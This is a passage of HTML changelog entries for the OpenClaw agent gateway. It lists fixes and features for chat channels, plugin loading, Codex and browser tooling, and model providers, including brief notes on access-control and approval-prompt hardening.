<li>Slack/threading: ignore internal reply ids when choosing Slack <code>thread_ts</code> values, so resumed replies keep the real Slack thread anchor instead of leaking to the channel root. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289781709" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68790" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68790/hovercard" href="https://github.com/openclaw/openclaw/issues/68790">#68790</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/failover: stop body-less HTTP 400/422 proxy failures from defaulting to <code>"format"</code> classification, so embedded retries surface the opaque provider failure instead of falling into a compaction loop. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261147672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66462" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66462/hovercard" href="https://github.com/openclaw/openclaw/issues/66462">#66462</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4266760059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67024" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67024/hovercard" href="https://github.com/openclaw/openclaw/pull/67024">#67024</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/altaywtf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/altaywtf">@altaywtf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HongzhuLiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HongzhuLiu">@HongzhuLiu</a>.</li>
<li>Plugins/loader: use cached discovery-mode snapshot loads for read-only plugin capability lookups, keep snapshot caches isolated from active Gateway registries, and make same-plugin channel/HTTP route re-registration idempotent so repeated snapshot or hot-reload paths no longer rerun full plugin side effects or accumulate duplicate surfaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113116446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51781" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51781/hovercard" href="https://github.com/openclaw/openclaw/issues/51781">#51781</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114492890" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52031" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52031/hovercard" href="https://github.com/openclaw/openclaw/issues/52031">#52031</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131981379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54181" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54181/hovercard" href="https://github.com/openclaw/openclaw/issues/54181">#54181</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167775992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57514" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57514/hovercard" href="https://github.com/openclaw/openclaw/issues/57514">#57514</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/livingghost/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/livingghost">@livingghost</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/okuyam2y/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/okuyam2y">@okuyam2y</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ShionEria/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ShionEria">@ShionEria</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bbshih/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bbshih">@bbshih</a>.</li>
<li>Plugins/loader: reuse the compatible active Gateway registry for broad runtime plugin ensure calls after a gateway-bindable boot load, so non-bundled plugins no longer re-run <code>register()</code> during the same boot path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293864650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69250" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69250/hovercard" href="https://github.com/openclaw/openclaw/issues/69250">#69250</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markthebest12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markthebest12">@markthebest12</a>.</li>
<li>Plugins/hooks: keep the gateway-bindable hook runner installed when later default-mode plugin loads activate a different registry, preserving Gateway subagent lifecycle hooks across runtime cache misses. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224749385" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63166" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63166/hovercard" href="https://github.com/openclaw/openclaw/issues/63166">#63166</a>.</li>
<li>Plugins/hooks: refresh live Gateway runtime hooks before inbound channel dispatch, so externally installed plugins keep <code>message_received</code>, <code>before_dispatch</code>, and reply hooks active after scoped startup plugin loads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324174566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71167" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71167/hovercard" href="https://github.com/openclaw/openclaw/issues/71167">#71167</a>.</li>
<li>Media/input: resolve canonical inbound media refs through the shared media loader so native prompt image replay and explicit image/PDF tools can read <code>media://inbound/&lt;id&gt;</code> and managed inbound replay paths under workspace-only file policy.</li>
<li>Media/tools: centralize media reference scheme classification for image, PDF, image-generation, video-generation, and music-generation inputs so managed inbound refs are accepted consistently.</li>
<li>Control UI/media: resolve canonical inbound media refs before serving assistant media previews, so <code>media://inbound/&lt;id&gt;</code> sources no longer pass access checks but fail file open.</li>
<li>Auth/Codex: bootstrap <code>openai-codex:default</code> from Codex CLI credentials on fresh installs without replacing a locally refreshed OpenClaw OAuth token later. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326391691" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71305/hovercard" href="https://github.com/openclaw/openclaw/issues/71305">#71305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gforce10-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gforce10-design">@Gforce10-design</a>.</li>
<li>Plugin SDK/tool-result transforms: bound middleware <code>details</code>, validate in-place result mutations, and mark fail-closed middleware fallbacks with canonical <code>error</code> status. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/gateway: prevent startup from getting stuck at <code>awaiting gateway readiness</code> when Carbon gateway registration races with a lifecycle reconnect. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116494450" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52372" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52372/hovercard" href="https://github.com/openclaw/openclaw/issues/52372">#52372</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283453314" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68159" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68159/hovercard" href="https://github.com/openclaw/openclaw/pull/68159">#68159</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IVY-AI-gif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IVY-AI-gif">@IVY-AI-gif</a>.</li>
<li>Discord/gateway: supervise Carbon's async gateway registration promise so fatal Discord metadata failures surface through startup instead of process-level unhandled rejections. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217354522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62451/hovercard" href="https://github.com/openclaw/openclaw/pull/62451">#62451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/safzanpirani/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/safzanpirani">@safzanpirani</a>.</li>
<li>Discord/gateway: record websocket frame activity as transport liveness, so idle but healthy Discord gateways no longer look stale between user messages. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284113483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68213" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68213/hovercard" href="https://github.com/openclaw/openclaw/pull/68213">#68213</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmadwaves/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmadwaves">@bmadwaves</a>.</li>
<li>Slack/streaming: suppress block replies while native or draft preview streaming owns the turn, preventing duplicate Slack delivery when block streaming is also enabled. Addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162028905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56675" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56675/hovercard" href="https://github.com/openclaw/openclaw/issues/56675">#56675</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hsiaoa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hsiaoa">@hsiaoa</a>.</li>
<li>Plugins/cache: restore plugin command and interactive handler registries on loader cache hits without resetting interactive callback dedupe, so cached external plugins keep slash commands and callback handlers available after reloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322927783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71100" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71100/hovercard" href="https://github.com/openclaw/openclaw/issues/71100">#71100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BomBastikDE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BomBastikDE">@BomBastikDE</a>.</li>
<li>Gateway/OpenAI-compatible: report non-zero token usage for <code>/v1/chat/completions</code> when the agent run has only last-call usage metadata available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323306047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71118" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71118/hovercard" href="https://github.com/openclaw/openclaw/issues/71118">#71118</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325326535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71242/hovercard" href="https://github.com/openclaw/openclaw/pull/71242">#71242</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RenzoMXD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RenzoMXD">@RenzoMXD</a>.</li>
<li>Plugin SDK/tool-result transforms: restrict harness tool-result middleware to bundled plugins, fail closed on middleware errors, validate rewritten result shapes, preserve Pi per-call ids, and keep Codex media trust checks anchored to raw tool provenance. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/MCP loopback: apply owner-only tool policy and run before-tool-call hooks on <code>127.0.0.1/mcp</code> <code>tools/list</code> and <code>tools/call</code>, so non-owner bearer callers can no longer see or invoke owner-only tools such as <code>cron</code>, <code>gateway</code>, and <code>nodes</code>, matching the existing HTTP <code>/tools/invoke</code> and embedded-agent paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324032890" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71159" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71159/hovercard" href="https://github.com/openclaw/openclaw/pull/71159">#71159</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>Codex harness/security: wait for final app-server approval decisions and sanitize approval preview text, so native Codex permission prompts cannot be resolved by an early placeholder decision or render unsafe terminal/control content. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318425863" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70751/hovercard" href="https://github.com/openclaw/openclaw/pull/70751">#70751</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315378279" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70569" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70569/hovercard" href="https://github.com/openclaw/openclaw/pull/70569">#70569</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Providers/voice security: route ElevenLabs TTS and OpenAI Realtime browser-session secret creation through guarded fetch paths, preserving provider calls while keeping SSRF protections on voice surfaces.</li>
<li>Agents/OpenAI WS: match Codex's Responses WebSocket continuation strategy, sending only strict incremental follow-up input with <code>previous_response_id</code> and falling back to full context when the replay chain or request shape differs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070070193" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44948/hovercard" href="https://github.com/openclaw/openclaw/issues/44948">#44948</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hss-oss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hss-oss">@hss-oss</a>.</li>
<li>Plugins/Google Chat: log webhook auth rejection reasons only after all candidates fail, and warn when add-on <code>appPrincipal</code> values do not match configuration. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322615533" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71078/hovercard" href="https://github.com/openclaw/openclaw/issues/71078">#71078</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323756032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71145" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71145/hovercard" href="https://github.com/openclaw/openclaw/pull/71145">#71145</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>.</li>
<li>Models/configure: preserve the existing default model when provider auth is re-run from configure while keeping explicit default-setting commands authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317590738" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70696" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70696/hovercard" href="https://github.com/openclaw/openclaw/issues/70696">#70696</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319072350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70793" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70793/hovercard" href="https://github.com/openclaw/openclaw/pull/70793">#70793</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sathvik-1007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sathvik-1007">@Sathvik-1007</a>.</li>
<li>Config/plugins: accept <code>plugins.entries.*.hooks.allowConversationAccess</code> in validation, generated schema metadata, and plugin policy inspection so trusted external plugins can enable conversation-access hooks such as <code>agent_end</code> without local schema patches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324944100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71215" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71215/hovercard" href="https://github.com/openclaw/openclaw/issues/71215">#71215</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325013522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71221" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71221/hovercard" href="https://github.com/openclaw/openclaw/pull/71221">#71221</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BillChirico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BillChirico">@BillChirico</a>.</li>
<li>Models/runtime: show one model provider choice per provider and move Codex, Claude CLI, and Gemini CLI execution into explicit runtime selection while keeping fallback-only legacy runtime refs unchanged. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime deps: respect explicit plugin and channel disablement when repairing bundled runtime dependencies, so doctor and health checks no longer install deps for disabled configured channels. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export logs through bounded diagnostic log events instead of a direct logger transport hook. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WhatsApp/plugins: support an explicit opt-in for inbound <code>message_received</code> hooks with canonical channel, conversation, session, and sender fields. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/setup: keep bundled setup entries dependency-light and stage WhatsApp runtime dependencies only when login actually needs them, so first-run setup and read-only channel discovery avoid unused SDK imports.</li>
<li>Slack/HTTP: keep webhook handlers in a process-global registry so HTTP mode survives plugin-loader/native-import splits and <code>/slack/events/&lt;account&gt;</code> no longer returns 404 after logging as active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279982561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67955" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67955/hovercard" href="https://github.com/openclaw/openclaw/issues/67955">#67955</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075952978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46245" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46245/hovercard" href="https://github.com/openclaw/openclaw/issues/46245">#46245</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075953402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46246" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46246/hovercard" href="https://github.com/openclaw/openclaw/issues/46246">#46246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chrisabad/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chrisabad">@chrisabad</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cesararevalo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cesararevalo">@cesararevalo</a>.</li>
<li>Diagnostics: harden tool and model diagnostic events against hostile errors, blocking listeners, and unsafe stability reason fields. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: record local plugin install source metadata without duplicating raw absolute local paths in persisted <code>plugins.installs</code>, while preserving linked load-path cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321016434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70970" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70970/hovercard" href="https://github.com/openclaw/openclaw/pull/70970">#70970</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Group chats/silent replies: tighten <code>NO_REPLY</code> prompt guidance so groups stay quiet without narrating silence or emitting fallback chatter when silence is the intended outcome. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320790563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70954/hovercard" href="https://github.com/openclaw/openclaw/pull/70954">#70954</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324868491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71209" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71209/hovercard" href="https://github.com/openclaw/openclaw/pull/71209">#71209</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>WhatsApp/groups+direct: setting <code>systemPrompt: ""</code> on a specific <code>groups.&lt;id&gt;</code> or <code>direct.&lt;peerId&gt;</code> entry now suppresses the wildcard system prompt instead of falling through to it, so users can silence the global prompt for a specific group or peer. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312304256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70381" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70381/hovercard" href="https://github.com/openclaw/openclaw/pull/70381">#70381</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bluetegu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bluetegu">@Bluetegu</a>.</li>
<li>Browser/tool: tell agents not to pass per-call <code>timeoutMs</code> on existing-session type, evaluate, and other Chrome MCP actions that reject timeout overrides.</li>
<li>Browser/tool: use Playwright's current AI aria snapshot API for <code>refs="aria"</code> and fall back to role refs when a node browser cannot provide aria refs, so agents can still inspect and click controls such as Google Meet admission buttons.</li>
<li>Browser/tool: expose stable <code>tabId</code> handles such as <code>t1</code> plus optional tab labels, and accept those handles anywhere a browser tab target is needed.</li>
<li>Browser/tool: return <code>suggestedTargetId</code> first in tab payloads so agents naturally reuse labels or stable tab handles instead of raw DevTools ids.</li>
<li>Browser/tool: bundle a <code>browser-automation</code> skill with the multi-step snapshot, stable-tab, stale-ref, and manual-blocker loop for agent-controlled pages.</li>
<li>Browser/tool: add <code>openclaw browser doctor</code>, URL-expanded snapshots, direct labeled screenshots, and clearer tab-target errors for agents that accidentally pass positional indexes.</li>
<li>Plugins/Google Meet: use browser automation to classify and clear Meet entry blockers such as microphone-choice interstitials, and reuse in-progress create tabs on retry instead of opening duplicates.</li>
<li>Codex/GPT-5.4: harden fallback, auth-profile, tool-schema, and replay edge cases across native and embedded runtime paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318241242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70743" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70743/hovercard" href="https://github.com/openclaw/openclaw/pull/70743">#70743</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Models/fallback: resolve bare fallback model provider ids before model switching, so configured fallback chains keep working when a fallback is named without an explicit provider prefix.</li>
<li>Voice-call/Telnyx: preserve inbound/outbound callback metadata and read transcription text from Telnyx's current <code>transcription_data</code> payload.</li>
<li>Providers/DeepSeek: wire V4 thinking controls and OpenAI-compatible replay policy so follow-up turns preserve DeepSeek <code>reasoning_content</code>, while the None/off thinking path strips replayed reasoning fields. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320422622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70931" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70931/hovercard" href="https://github.com/openclaw/openclaw/issues/70931">#70931</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lsdsjy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lsdsjy">@lsdsjy</a>.</li>
<li>Providers/GitHub Copilot: align Copilot request headers across Anthropic, Responses, and built-in compaction summarization paths, including tool-result and image follow-up turns, without enabling unverified Responses continuation.</li>
<li>Codex harness: send verbose tool progress to chat channels for native app-server runs, matching the Pi harness <code>/verbose on</code> and <code>/verbose full</code> behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320982363" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70966" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70966/hovercard" href="https://github.com/openclaw/openclaw/pull/70966">#70966</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Codex models: fetch paginated Codex app-server model catalogs, mark truncated <code>/codex models</code> output, and keep ChatGPT OAuth defaults on the <code>openai-codex/gpt-5.5</code> route instead of the OpenAI API-key route.</li>
<li>Codex status: report Codex CLI OAuth as <code>oauth (codex-cli)</code> for native <code>codex/*</code> sessions instead of showing unknown auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317502107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70688" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70688/hovercard" href="https://github.com/openclaw/openclaw/issues/70688">#70688</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</li>
<li>Channels/CLI: accept explicit shared-secret, base-URL, and auth-directory setup flags, and map legacy Nextcloud Talk <code>--url</code>/<code>--token</code> add commands to the bundled plugin setup input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210534950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61759" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61759/hovercard" href="https://github.com/openclaw/openclaw/issues/61759">#61759</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212050977" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61923" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61923/hovercard" href="https://github.com/openclaw/openclaw/issues/61923">#61923</a>.</li>
<li>Models/CLI: keep <code>openclaw models list</code> read-only while still showing eligible configured-provider rows, so listing models no longer rewrites per-agent <code>models.json</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319660080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70847" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70847/hovercard" href="https://github.com/openclaw/openclaw/pull/70847">#70847</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
